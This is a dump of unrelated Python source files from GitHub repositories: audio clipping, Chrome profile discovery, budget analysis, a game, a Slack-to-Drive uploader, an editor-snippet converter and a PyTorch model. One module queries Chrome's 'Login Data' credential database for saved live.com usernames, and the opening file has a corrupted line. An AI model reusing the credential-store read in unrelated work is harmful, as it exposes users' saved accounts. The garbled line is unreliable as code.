AudioSegment\nfrom pytube import YouTube\nfrom pytube.cli import on_progress\nimport shutil\n\n\ndef replaceCharacters(str):\n '''\n Drops reserved characters from string.\n Source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?redirectedfrom=MSDN\n '''\n skipChars = \"`~!@#$%^&*()_+=-|}{[]\\;':?>mm:ss, mm:ss\n trackTitle (str): \tTitle of the YouTube video\t\t\t\t\n '''\n if not os.path.exists('./trackfiles/'+trackTitle):\n os.makedirs('./trackfiles/'+trackTitle)\n count = 0\n print(\"\\n---Clipping Audio to Time Stamps!---\")\n for line in timeStamp[1:]:\n times = line.split(',')\n start, finish = times[0], times[1]\n\n startMin, startSec = (start.split(':'))\n finishMin, finishSec = (finish.split(':'))\n\n startTime = (int(startMin) * 60 + int(startSec)) * 1000\n finishTime = (int(finishMin) * 60 + int(finishSec)) * 1000\n # try:\n cutAudio = audioFile[startTime:finishTime]\n cutAudio.export(\n f\"{downloadPath}/{trackTitle}/{exportName}{count}.mp3\", format=\"mp3\")\n # except:\n # print(\"Couldn't export clip of time stamp: {start}-{finish}\")\n\n count = count + 1\n print(\"\\n---Clipping Complete---\")\n\n\nif __name__ == \"__main__\":\n file = open('Link.txt', 'r')\n lines = file.readlines()\n link = lines[0]\n\n print(\"YouTube link received: \" + link, end='')\n downloadPath = os.path.join(os.getcwd(), \"downloads\")\n\n trackTitle = download(link, downloadPath)\n\n reqPath = os.path.join(\n os.getcwd(), \"downloads\", trackTitle, trackTitle.replace(',', '') + \".mp4\")\n audioFile = AudioSegment.from_file(reqPath, \"mp4\")\n\n exportName = trackTitle.split(' ')[0]\n clipAudio(audioFile, lines, trackTitle, downloadPath)\n shutil.copy2('Link.txt', os.path.join(downloadPath, trackTitle))\n","repo_name":"gauravshilpakar/DeceptionDetection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33827613032","text":"import json\nimport logging\nimport os\nimport sqlite3\nimport sys\nfrom enum import Enum, auto\nfrom pathlib import Path\nfrom typing import ClassVar, Dict, List, Optional, Set, Tuple\n\nfrom attr import field\nfrom attrs import define\n\nfrom automsr.config import validate_email\n\nlogger = logging.getLogger(__name__)\n\nENV_HOME = os.environ.get(\"HOME\")\nENV_LOCALAPPDATA = os.environ.get(\"LOCALAPPDATA\")\n\n\nclass ChromeVariant(Enum):\n \"\"\"\n Chrome variants available\n \"\"\"\n\n CHROME = auto()\n CHROME_BETA = auto()\n CHROME_CANARY = auto()\n CHROMIUM = auto()\n\n\nclass OutputFormat(Enum):\n 
\"\"\"\n Types of output formats available for printing found Chrome profiles o stdout.\n \"\"\"\n\n LIST = \"list\"\n JSON = \"json\"\n PRETTY_JSON = \"pretty-json\"\n\n\ndef get_platform() -> str:\n \"\"\"\n Returns a simplified version of the system platform in use.\n \"\"\"\n\n retval = \"linux\" # assumes linux env if not win32 or darwin\n\n if sys.platform.startswith(\"win32\"):\n retval = \"windows\"\n elif sys.platform.startswith(\"darwin\"):\n retval = \"macOS\"\n\n return retval\n\n\n@define\nclass ChromeProfile:\n displayed_name: str\n path: Path\n\n RESERVED_NAMES = [\"System Profile\", \"Guest Profile\"]\n\n def as_dict(self) -> Dict[str, str]:\n return dict(displayed_name=self.displayed_name, path=str(self.path.resolve()))\n\n @classmethod\n def from_directory(cls, path: Path) -> Optional[\"ChromeProfile\"]:\n \"\"\"\n Returns a Chrome Profile based on a directory.\n\n Returns `None` if the provided `path` is not a valid Chrome Profile.\n \"\"\"\n\n # If the provided path is not an existing directory, returns None\n if not path.is_dir():\n return None\n\n # If the directory name is one of the reserved name for Google profiles\n # not matching any user profile, returns None\n if path.name in cls.RESERVED_NAMES:\n return None\n\n # If this file doesn't exist, it's not a profile\n preferences_path = path / \"Preferences\"\n if not preferences_path.is_file():\n return None\n\n preferences_dict = json.load(open(preferences_path, encoding=\"utf-8\"))\n displayed_name = preferences_dict.get(\"profile\", {}).get(\"name\", \"\")\n return cls(displayed_name=displayed_name, path=path)\n\n def get_email(self) -> Optional[str]:\n \"\"\"\n Try to get the Outlook email address from the profile data.\n \"\"\"\n\n allowed_domains = {\"outlook\", \"live\", \"hotmail\", \"msn\"}\n\n @define(order=True, frozen=True)\n class Record:\n email: str = field(order=False)\n timestamp: int\n\n @classmethod\n def from_row(cls, row: Tuple[str, str]) -> Optional[\"Record\"]:\n \"\"\"\n Parse a row obtained from the Login Data database of Chrome.\n\n If the row is not compatible with our criteria, returns None.\n \"\"\"\n\n assert len(row) == 2\n email_value: str = row[0]\n timestamp_value: int = int(row[1])\n\n if not validate_email(email_value, raise_on_error=False):\n return None\n\n domain = email_value.split(\"@\")[1].split(\".\")[0]\n if domain not in allowed_domains:\n return None\n\n return cls(email=email_value, timestamp=timestamp_value)\n\n # TODO check if this path is valid for every OS\n login_database: Path = self.path / \"Login Data\"\n if not login_database.is_file():\n logger.debug(\"No login database found: %s\", login_database)\n return None\n\n with sqlite3.connect(login_database) as conn:\n cur = conn.execute(\n \"\"\"\\\n select t.username_value, t.date_last_used\n from main.logins t\n where t.username_value <> ''\n and t.origin_url like '%live.com%';\"\"\"\n )\n all_rows: List[Tuple[str, str]] = cur.fetchall()\n\n valid_records: List[Optional[Record]] = [\n Record.from_row(row=row) for row in all_rows\n ]\n valid_non_null_records: List[Record] = [\n record for record in valid_records if record is not None\n ]\n unique_emails: Set[str] = {record.email for record in valid_non_null_records}\n logger.debug(\"Outlook emails found: %s\", unique_emails)\n\n if not unique_emails:\n logger.debug(\"No Outlook email found!\")\n return None\n elif len(unique_emails) > 1:\n logger.debug(\n \"More than one Outlook email found! 
Will return the latest email used.\"\n )\n latest_record: Record = max(valid_non_null_records)\n return latest_record.email\n else:\n logger.debug(\"Found only one Outlook email.\")\n return unique_emails.pop()\n\n\n@define\nclass ProfilesExecutor:\n chrome_variant: ChromeVariant = ChromeVariant.CHROME\n profiles_root_path: Optional[Path] = None\n\n # source: https://chromium.googlesource.com/chromium/src/+/master/docs/user_data_dir.md#default-location\n CHROME_DEFAULT_PROFILES_LOCATIONS: ClassVar[\n Dict[str, Dict[ChromeVariant, Path]]\n ] = {\n \"macOS\": {\n ChromeVariant.CHROME: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome\"\n ),\n ChromeVariant.CHROME_BETA: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome Beta\"\n ),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome Canary\"\n ),\n ChromeVariant.CHROMIUM: Path(\n f\"{ENV_HOME}/Library/Application Support/Chromium\"\n ),\n },\n \"windows\": {\n ChromeVariant.CHROME: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome\\\\User Data\"\n ),\n ChromeVariant.CHROME_BETA: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome Beta\\\\User Data\"\n ),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome SxS\\\\User Data\"\n ),\n ChromeVariant.CHROMIUM: Path(f\"{ENV_LOCALAPPDATA}\\\\Chromium\\\\User Data\"),\n },\n \"linux\": {\n ChromeVariant.CHROME: Path(f\"{ENV_HOME}/.config/google-chrome\"),\n ChromeVariant.CHROME_BETA: Path(f\"{ENV_HOME}/.config/google-chrome-beta\"),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_HOME}/.config/google-chrome-unstable\"\n ),\n ChromeVariant.CHROMIUM: Path(f\"{ENV_HOME}/.config/chromium\"),\n },\n }\n\n def get_profiles_root_path(self) -> Path:\n \"\"\"\n Based on current state, get the root path of Chrome profiles.\n \"\"\"\n\n if self.profiles_root_path is not None:\n logger.info(\n \"Profiles root path was manually set to: %s\", self.profiles_root_path\n )\n return self.profiles_root_path\n\n platform = get_platform()\n logger.debug(\"Platform to use: %s\", platform)\n logger.debug(\"Chrome variant to use: %s\", self.chrome_variant)\n\n profiles_root_path = self.CHROME_DEFAULT_PROFILES_LOCATIONS[platform][\n self.chrome_variant\n ]\n logger.info(\n \"Profiles root path was automatically found to be: %s\", profiles_root_path\n )\n return profiles_root_path\n\n def get_profiles(self) -> List[ChromeProfile]:\n \"\"\"\n Return the list of Chrome profiles found.\n \"\"\"\n\n root_path = self.get_profiles_root_path()\n\n # Safety check\n if not root_path.exists():\n raise FileNotFoundError(root_path)\n\n chrome_profiles: List[ChromeProfile] = []\n\n for directory in root_path.iterdir():\n chrome_profile = ChromeProfile.from_directory(path=directory)\n if chrome_profile is None:\n continue\n\n logger.info(\"Found Chrome profile: %s\", chrome_profile)\n chrome_profiles.append(chrome_profile)\n\n return chrome_profiles\n\n def print_profiles(self, output_format: OutputFormat = OutputFormat.LIST) -> None:\n \"\"\"\n Get the list of Chrome profiles found, then print it to stdout.\n\n It's possible to specify a type for printing the values obtained to stdout.\n \"\"\"\n\n profiles: List[ChromeProfile] = self.get_profiles()\n\n if output_format is OutputFormat.LIST:\n data = \"\\n\".join([str(profile) for profile in profiles])\n\n elif output_format is OutputFormat.JSON:\n data = json.dumps([profile.as_dict() for profile in profiles])\n\n elif output_format is OutputFormat.PRETTY_JSON:\n data = 
json.dumps([profile.as_dict() for profile in profiles], indent=4)\n\n else:\n raise ValueError(output_format)\n\n data += \"\\n\" # add manually a final newline\n sys.stdout.write(data)\n","repo_name":"Crissal1995/automsr","sub_path":"automsr/browser/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":9043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"28346307557","text":"import os\nimport csv\n\nfile_path = os.path.join(\"Resources\", \"budget_data.csv\")\n\ndef average(numbers):\n\n average = sum(numbers)/len(numbers)\n return average\n\ndef to_currency(value):\n return '${:,}'.format(value)\n\nwith open(file_path, 'r') as csvfile:\n budget_data_reader = csv.reader(csvfile, delimiter=',')\n\n budget_data_header = next(budget_data_reader)\n\n total_months = 0\n net_total_profit_loss = 0\n change_in_profit_loss = []\n months = []\n\n previous_profit_loss = 0\n\n for row in budget_data_reader:\n # Adding another month to the list of total months counted\n total_months += 1\n # Adding to the total net profit loss\n net_total_profit_loss += int(row[1])\n # Appending the date of the record\n months.append(row[0])\n # Calculating the change in profit loss from the previous month to the next month\n next_profit_loss = int(row[1])\n\n change_in_profit_loss.append(next_profit_loss - previous_profit_loss)\n\n previous_profit_loss = int(row[1])\n # Removing the first profit/loss because we don't have a previous month\n change_in_profit_loss.pop(0)\n average_change = average(change_in_profit_loss)\n\n max_profit_change = max(change_in_profit_loss)\n min_loss_change = min(change_in_profit_loss)\n\n max_profit_change_index = change_in_profit_loss.index(max_profit_change) + 1\n min_loss_change_index = change_in_profit_loss.index(min_loss_change) + 1\n\n max_profit_month = months[max_profit_change_index]\n min_loss_month = months[min_loss_change_index]\n\n net_total_profit_loss_currency = to_currency(net_total_profit_loss)\n\n \n\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: {net_total_profit_loss_currency}\")\nprint(\"Average Change: $%.2f\" % average_change)\nprint(f\"Greatest Increase in Profits: {max_profit_month} (${max_profit_change})\")\nprint(f\"Greatest Decrease in Profits: {min_loss_month} (${min_loss_change})\")\n\noutput_path = os.path.join(\"financial_analysis.txt\")\n\nwith open(output_path, 'w') as txtfile:\n txtfile.write(\"Financial Analysis\\n\")\n txtfile.write(\"----------------------------\\n\")\n txtfile.write(f\"Total Months: {total_months}\\n\")\n txtfile.write(f\"Total: {net_total_profit_loss_currency}\\n\")\n txtfile.write(f\"Average Change: $%.2f\" % average_change + \"\\n\")\n txtfile.write(f\"Greatest Increase in Profits: {max_profit_month} (${max_profit_change})\\n\")\n txtfile.write(f\"Greatest Decrease in Profits: {min_loss_month} (${min_loss_change})\")\n\n txtfile.close()","repo_name":"camiloibanez/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"20199481162","text":"'''\nCreated on Mar 6, 2021\n\nMake a two-player Rock-Paper-Scissors game. 
\n(Hint: Ask for player plays (using input), \ncompare them, print out a message of congratulations to the winner)\n\nRemember the rules:\n\nRock beats scissors\nScissors beats Paper\nPaper beats Rock\n\n@author: lindseymerwin\n'''\n\n \n\n \n\n\ndef rock_paper_scissors():\n# each player selects their first move\n player1 = input('Player 1 enter first move: ')\n player2 = input('Player 2 enter first move: ')\n \n if player1 in moves and player2 in moves:\n \n player1 = moves[player1]\n player2 = moves[player2]\n\n if player1 == 1:\n if player2 == 3:\n print('PLAYER 1 WINS!')\n \n elif player2 == 2:\n print('PLAYER 2 WINS')\n \n elif player2 == 1:\n print('CATS GAME') \n \n if player1 == 2:\n if player2 == 1:\n print('PLAYER 1 WINS!')\n \n elif player2 == 3:\n print('PLAYER 2 WINS')\n \n elif player2 == 2:\n print('CATS GAME') \n \n if player1 == 3:\n if player2 == 2:\n print('PLAYER 1 WINS!')\n \n elif player2 == 1:\n print('PLAYER 2 WINS')\n \n elif player2 == 3:\n print('CATS GAME') \n \n else:\n print('Invalid, must be rock, paper, or scissors')\n\n\n\nmoves = {'rock': 1, 'paper': 2, 'scissors': 3} # <-- gives options\nuser_moves = rock_paper_scissors()\n\n\n","repo_name":"Lindsey-Thompson/Rock_Paper_Scissors","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"5350616599","text":"# -*- coding:utf-8 -*-\nimport requests\nimport json\nimport re\nimport shutil\nimport time\nfrom datetime import datetime, timedelta, timezone\nimport urllib.request, urllib.error\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n# IMAGE ID =================\n# Set the ID of the file to download\nfile_id = \"*********\"\n# IMAGE ID =================\n\n# SLACK =================\n# Slack API token / channel used to fetch the list of files\nslack_API_token = \"YOUR API TOKEN KEY\"\nchannel = \"CHANNEL ID\"\n# SLACK =================\n\n# HEADERS =================\n# Basic manners when scraping/crawling\nheaders = {\"User-Agent\": \"browsers:browser name, OS:OS name\"}\n# Access bans seem to have stopped since adding this\n# HEADERS =================\n\n# GOOGLE =================\n# Perform Google authentication\ngauth = GoogleAuth()\ngauth.CommandLineAuth(GoogleAuth())\n\n# Get a Google Drive object --- (*1)\ndrive = GoogleDrive(gauth)\n\n # Folder ID inside Drive\nfolder_id = \"ID of the destination folder in Google Drive\"\n# GOOGLE =================\n\n# Download from Slack to local disk\ndef download_imgurl(url, file_name):\n res = requests.get(url, stream=True)\n if res.status_code == 200:\n with open(file_name, 'wb') as file:\n shutil.copyfileobj(res.raw, file)\n return 1\n else:\n return -1\n\n# Get a URL from which the image can be downloaded.\ndef get_img_url(slack_API_token, id_number):\n # 1) Use the files.sharedPublicURL API\n public_url = \"https://slack.com/api/files.sharedPublicURL?token=%s&file=%s&pretty=1\" % (slack_API_token, id_number)\n # 2) Decode the files.sharedPublicURL response as utf-8 so it can be used as a str\n response_share = urllib.request.urlopen(public_url).read().decode(\"utf-8\")\n # 3) Compile a regex that searches for permalink_public so the public URL can be extracted.\n pubhtml_pattern = re.compile(r'\\\"permalink_public\\\": \\\"([a-zA-Z0-9!-/:-@¥[-`{-~]+)\\\",\\n')\n # 4) Use pubhtml_pattern to get the public URL, then strip the backslashes it contains.\n img_html_url = pubhtml_pattern.findall(response_share)[0].replace(\"\\\\\",\"\")\n # 5) Access the public URL, fetch the page source and convert it to a str.\n response_get_img = urllib.request.urlopen(img_html_url).read().decode(\"utf-8\")\n # 6) Compile the regex for extracting the image.\n puburl_pattern = re.compile(r'\\n')\n # 7) Extract the img src=~ tag that refers to the image\n img_url = puburl_pattern.findall(response_get_img)[0]\n # 8) Return the URL of the extracted image\n return img_url\n\n# ↑↑↑ preparation ends here ↑↑↑\n# ↓↓↓ processing starts here ↓↓↓\n\n# Get information about the posted images\nfile_list_url = \"https://slack.com/api/files.list?token=%s&pretty=1\" % (slack_API_token)\nresponse1 = requests.get(file_list_url, headers=headers)\njson_data = response1.json()\nimg_files = json_data['files']\n\n# Download the image from Slack\ntry:\n print('I will download...')\n img_url = get_img_url(slack_API_token, file_id)\n download_imgurl(img_url, file_id + '.jpg')\n print('Download Complete!!')\nexcept Exception:\n print('ERROR: ' + file_id + \" download failed.\")\n pass\n\n# Close the public URL we opened and restore the original, inaccessible state\nprint('Disable the URL...')\nrevoke_url = \"https://slack.com/api/files.revokePublicURL?token=%s&file=%s&pretty=1\" % (slack_API_token, file_id)\nresponse_revo = urllib.request.urlopen(revoke_url).read()\nprint('Disable Complete!!')\n\n\n# Upload to Google Drive\nimg_name = file_id + '.jpg'\nf = drive.CreateFile({\n 'title': img_name,\n 'mimeType': 'image/jpeg',\n 'parents': [{'kind': 'drive#fileLink', 'id':folder_id}]\n })\nf.SetContentFile(img_name)\nf.Upload()\nprint('Upload Complete!!')\n","repo_name":"flower81/imgUpload","sub_path":"photoSingle.py","file_name":"photoSingle.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"29781772255","text":"from django.contrib.auth.models import Permission, Group\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\n\n\ndef get_permissions(model, permissions):\n \"\"\"Get permissions from a model name and the different permissions that exist in the system\"\"\"\n perm_q = Q()\n for perm in permissions:\n perm_q |= Q(codename=perm + '_' + model)\n return Permission.objects.filter(perm_q)\n\n\ndef create_special_permissions():\n \"\"\"Create the default permissions in the system (extra permissions for the Vale de Solicitud and Vale de Movimiento)\"\"\"\n # Getting Content Type\n request_ticket_content_type = ContentType.objects.get(app_label='system', model='requestticket')\n movement_ticket_content_type = ContentType.objects.get(app_label='system', model='movementticket')\n\n # Creating permissions\n own_request_ticket, _ = Permission.objects.get_or_create(codename='own_requestticket',\n name='Can only view own Vale de Solicitud',\n content_type=request_ticket_content_type)\n own_movement_ticket, _ = Permission.objects.get_or_create(codename='own_movementticket',\n name='Can only view own Vale de Movimiento',\n content_type=movement_ticket_content_type)\n return own_request_ticket, own_movement_ticket\n\n\ndef create_default_groups():\n \"\"\"Create the default permission groups (Administrador, Jefe de Departamento, Vicedecano)\"\"\"\n if Group.objects.filter(\n Q(name='Administrador') | Q(name='Jefe de Departamento') | Q(name='Vicedecano')).count() < 3:\n # Create each group and assign it the corresponding permissions\n # Administrador\n admin, created = Group.objects.get_or_create(name='Administrador')\n if created:\n perm = ['view', 'add', 'change', 'delete']\n admin.permissions.set(get_permissions('user', perm) | get_permissions('group', perm))\n admin.save()\n\n # Jefe de Departamento\n jefe, created = Group.objects.get_or_create(name='Jefe de Departamento')\n if created:\n # Extract special permissions\n own_request_ticket, own_movement_ticket = create_special_permissions()\n\n perm = ['view', 'add', 'change', 'delete', 'own']\n jefe.permissions.set(get_permissions('basicmediumexpedient', ['view']) |\n get_permissions('movementticket', perm) | get_permissions('requestticket', perm))\n jefe.permissions.add(own_request_ticket)\n jefe.permissions.add(own_movement_ticket)\n jefe.save()\n\n # Vicedecano\n vicedecano, created = Group.objects.get_or_create(name='Vicedecano')\n if created:\n perm = ['view', 'add', 'change', 'delete']\n vicedecano.permissions.set(get_permissions('basicmediumexpedient', perm) |\n get_permissions('movementticket', perm) |\n get_permissions('requestticket', perm) |\n get_permissions('responsibilitycertificate', perm))\n vicedecano.save()\n","repo_name":"ISW-P5/Gestion-Medios-Basicos","sub_path":"system/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"43566098909","text":"#!/usr/bin/python3\n\nimport argparse\nfrom xml.dom.minidom import parse, Document\nimport json\nimport re\nfrom sys import stderr, exit\nfrom abc import ABC, abstractmethod\n\n\nclass Editor(ABC):\n \"\"\" An abstract class for all the editors \"\"\"\n fpath = \"\"\n document = \"\"\n\n @abstractmethod\n def parse(self):\n pass\n\n @abstractmethod\n def create(self):\n pass\n\n @abstractmethod\n def write(self):\n pass\n\n\nclass IntelliJXML(Editor):\n \"\"\" A class to handle IntelliJ XML documents\"\"\"\n fpath = \"\"\n document = \"\"\n\n def __init__(self, path):\n self.fpath = path\n\n def parse(self):\n self.document = parse(self.fpath)\n\n def getBody(self, template):\n body = template.getAttribute(\"value\")\n\n # Get rid of double dollar signs and make them single dollar signs\n body = re.sub(r\"\\$([0-9]*)\\$\", r\"$\\1\", body)\n\n result = body.split(\"\\n\")\n return result\n\n def create(self):\n group = self.fpath[:-4]\n group = re.sub(r\"(.*/)\", r\"\", group)\n group = re.sub(r\"(.*\\\\)\", r\"\", group)\n group = re.sub(r\"(/.*/)\", r\"\", group)\n group = re.sub(r\"(\\\\.*\\\\)\", r\"\", group)\n\n self.document = Document()\n\n templateSet = self.document.createElement('templateSet')\n templateSet.setAttribute(\"group\", group)\n\n self.document.appendChild(templateSet)\n\n def add(self, context, name, value):\n # Add template\n template = self.document.createElement(\"template\")\n template.setAttribute(\"name\", value[\"prefix\"])\n template.setAttribute(\"description\", name)\n template.setAttribute(\"toReformat\", \"false\")\n template.setAttribute(\"toShortenFQNames\", \"true\")\n\n body = \"\\n\".join(value[\"body\"])\n\n # Find all variables\n vars = set()\n for var in [x.group() for x in re.finditer(r\"(\\$[0-9]+)\", body)]:\n vars.add(var)\n\n # Replace single dollar sign with enclosing dollar signs\n body = re.sub(r\"(\\$[0-9]+)\", r\"\\1$\", body)\n\n # Escape \\n\n body = body.replace(\"\\n\", \" \")\n\n template.setAttribute(\"value\", body)\n\n # Add all the variables in template\n for i in range(0, len(vars)):\n variable = self.document.createElement(\"variable\")\n variable.setAttribute(\"name\", str(i+1))\n variable.setAttribute(\"expression\", \"\")\n variable.setAttribute(\"defaultValue\", \"\")\n variable.setAttribute(\"alwaysStopAt\", \"true\")\n\n template.appendChild(variable)\n\n # Add context and option\n ctx = self.document.createElement(\"context\")\n option = self.document.createElement(\"option\")\n\n option.setAttribute(\"name\", context)\n option.setAttribute(\"value\", \"true\")\n\n # Append option to context\n ctx.appendChild(option)\n\n # Append context to template\n template.appendChild(ctx)\n\n # 
Append template to templateSet inside the XML document\n templateSet = self.document.getElementsByTagName(\"templateSet\")[0]\n templateSet.appendChild(template)\n\n def write(self):\n xmlString = self.document.toprettyxml().split(\n \"\\n\", 1)[1].replace(\"&#10;\", \" \")\n\n xmlFile = open(self.fpath, 'w')\n xmlFile.write(xmlString)\n xmlFile.close()\n\n\nclass VSCodeJSON(Editor):\n \"\"\" A class to handle VSCode JSON documents\"\"\"\n\n def __init__(self, path):\n self.fpath = path\n self.document = {}\n\n def create(self):\n pass\n\n def add(self, name, body):\n self.document[name] = {\"prefix\": name, \"body\": body}\n\n def write(self):\n # Dump into formatted JSON\n jsonString = json.dumps(self.document, indent=4)\n # Replace begining and and [] with {}\n jsonString = '{' + jsonString[1:-1] + '}'\n\n jsonFile = open(self.fpath, \"w\")\n jsonFile.write(jsonString)\n jsonFile.close()\n\n def parse(self):\n datafile = open(self.fpath, 'r')\n self.document = json.load(datafile)\n datafile.close()\n\n\nclass ArgParser(argparse.ArgumentParser):\n def error(self, message):\n stderr.write('error: %s\\n_____\\n' % message)\n self.print_help()\n exit(-2)\n\n def getValuesFromArgs(self):\n self.__init__(prog='convert_jc',\n description='IntelliJ XML <-> VSCode JSON converter')\n self.add_argument(\"-i\", \"--infile\", help=\"In file\", required=True)\n self.add_argument(\"-o\", \"--outfile\", help=\"Out file\", required=True)\n self.add_argument(\n \"-c\", \"--context\", help=\"Context (i.e.: PHP, JAVA_SCRIPT etc.)\")\n\n args = self.parse_args()\n\n xml = args.infile if args.infile[-3:] == \"xml\" else args.outfile\n json = args.infile if args.infile[-4:] == \"json\" else args.outfile\n direction = 1 if args.infile[-3:] == \"xml\" else -1\n\n return [xml, json, args.context, direction]\n\n\nif __name__ == \"__main__\":\n (xmldoc, jsondoc, context, direction) = ArgParser().getValuesFromArgs()\n intellij = IntelliJXML(xmldoc)\n vscode = VSCodeJSON(jsondoc)\n\n if direction == 1: # IntelliJ -> VSCode\n intellij.parse()\n vscode.create()\n\n for template in intellij.document.getElementsByTagName(\"template\"):\n name = template.getAttribute(\"name\")\n body = intellij.getBody(template)\n\n vscode.add(name, body)\n\n vscode.write()\n else: # VScode -> IntelliJ\n if context is None:\n print(\"Please provide context (i.e.: PHP, JAVA_SCRIPT etc.)\")\n exit(-1)\n\n vscode.parse()\n intellij.create()\n\n for k, v in vscode.document.items():\n intellij.add(context, k, v)\n\n intellij.write()\n","repo_name":"fredtux/IntelliJ_VSCode_Snippets","sub_path":"convert_jc.py","file_name":"convert_jc.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43025511128","text":"import torch\nfrom torch import Tensor, nn\nfrom torch.nn import Linear\nfrom copy import copy, deepcopy\n\nimport pdb\n\nEXTRACTED_DATASETS = ['birds', 'flowers', 'cifar10', 'pets', 'food101']\nNUM_CLASSES = {'birds':500, 'flowers':102, 'cifar10':10, 'pets':37, 'food101': 101}\nDATASETS = EXTRACTED_DATASETS + ['fmnist', 'year_pred']\n\n\ndef get_in_out_shape(dataset_name):\n if dataset_name in EXTRACTED_DATASETS:\n return (2048, NUM_CLASSES[dataset_name])\n elif dataset_name == \"year_pred\":\n return (90, 1)\n else:\n print(\"Not implemented yet.\\n in out shape\")\n\ndef get_criterion(dataset_name, reduction='mean'):\n if dataset_name in EXTRACTED_DATASETS:\n return torch.nn.CrossEntropyLoss(reduction=reduction)\n elif dataset_name == 
\"year_pred\":\n return torch.nn.MSELoss(reduction=reduction) \n elif dataset_name == \"fmnist\":\n return torch.nn.CrossEntropyLoss(reduction=reduction)\n \nclass EnhancedModel(nn.Module):\n \n def __init__(self, grad_mode, criterion, **kwargs):\n super().__init__()\n assert grad_mode in ['first order', \n 'zeroth order delta', \n 'zeroth order forward-mode AD',\n 'zeroth order bidirectional delta', \n 'zeroth order unbiased delta',\n 'temp']\n self.grad_mode = grad_mode\n self.criterion = criterion\n self.past_move = None\n self.acc_def = \"class number\"\n if 'zeroth order' in grad_mode:\n self.random_vecs = kwargs.get('random vecs', 100)\n device_name = kwargs.get(\"device name\", \"cuda:0\")\n self.device = torch.device(device_name)\n self.to(self.device)\n \n @staticmethod\n def average_models(model_1, model_2):\n sd_1 = model_1.state_dict()\n sd_2 = model_2.state_dict()\n \n averaged_sd = deepcopy(sd_1)\n for key in sd_1:\n averaged_sd[key] = (sd_1[key] + sd_2[key]) / 2\n return averaged_sd\n \n def get_sd(self):\n return self.state_dict()\n \n def compute_grad(self, Xb, yb, lr=None):\n assert self.grad_mode in ['first order', 'zeroth order forward-mode AD']\n \n self.zero_grad()\n outputs = self(Xb)\n loss = self.criterion(outputs, yb)\n# pdb.set_trace()\n loss.backward()\n actual_grad = [param.grad for param in self.parameters()]\n grad = torch.cat([gr.flatten() for gr in actual_grad], 0)\n if self.grad_mode == 'zeroth order forward-mode AD':\n y_vectors = torch.randn(self.random_vecs, *grad.shape, device=self.device) #, device=self.device\n efficiency = torch.matmul(y_vectors, grad)\n grad = torch.mean(efficiency.unsqueeze(1) * y_vectors, dim=0)\n return grad, loss\n \n def move(self, vector, lr):\n if self.past_move == None:\n self.past_move = vector\n next_move = 0.9*self.past_move + 0.1*vector\n params = torch.nn.utils.parameters_to_vector(self.parameters())\n torch.nn.utils.vector_to_parameters(params - (lr * next_move), self.parameters())\n self.past_move = next_move\n \n def evaluate(self, dataloader):\n model = self\n model_initial_training = model.training\n model.eval()\n\n total_loss = 0\n count = 0\n corrects = 0\n data_count = 0\n criterion = self.criterion\n result = {}\n\n with torch.no_grad():\n for data in dataloader:\n Xb, yb = data\n Xb, yb = Xb.to(self.device), yb.to(self.device)\n count += 1\n outputs = model(Xb)\n loss = criterion(outputs, yb)\n data_count += Xb.shape[0]\n total_loss += loss\n if self.acc_def == \"class number\":\n preds = torch.argmax(outputs, dim=1)\n corrects += torch.sum((preds == yb).float())\n else:\n corrects += torch.sum((torch.abs(outputs - yb) < 0.01).float())\n \n result[\"Loss\"] = float(total_loss / count)\n result[\"Accuracy\"] = float(corrects / data_count)\n model.train(model_initial_training)\n return result\n \ndef one_three_multiplication(one, three): #One.shape= (b), three.shape= (b, m, n). 
Returns the product of each number in one to each layer of three\n shape = three.shape\n temp = torch.diag(one) @ three.reshape(shape[0], -1)\n return temp.reshape(shape)\n \nclass LinearEnhancedModel(EnhancedModel):\n \n def __init__(self, in_out_dim, grad_mode, criterion, **kwargs):\n EnhancedModel.__init__(self, grad_mode, criterion, **kwargs)\n self.linear = Linear(*in_out_dim)\n if grad_mode != 'temp':\n self.dim = sum([p.numel() for p in self.parameters()])\n self.dataset_name = kwargs.get('dataset_name', None)\n self.criterion_non_reduce = get_criterion(dataset_name = self.dataset_name,\n reduction='none')\n self.to(self.device)\n \n def forward(self, Xb):\n return self.linear(Xb)\n \n def perturb(self, search_radiuses):\n perturbations, new_params = [], []\n vecs_count = self.random_vecs\n for i, param in enumerate(self.parameters()):\n stacked_parameter = (torch.t(param)).repeat((vecs_count, ) + \n (1, )* (len(param.size())))\n \n random_perturbation = torch.Tensor([]) \n random_perturbation = torch.randn_like((torch.t(param)).repeat(\n (self.random_vecs, ) + (1, )* (len(param.size()))))\n \n perturbation_amount = random_perturbation\n 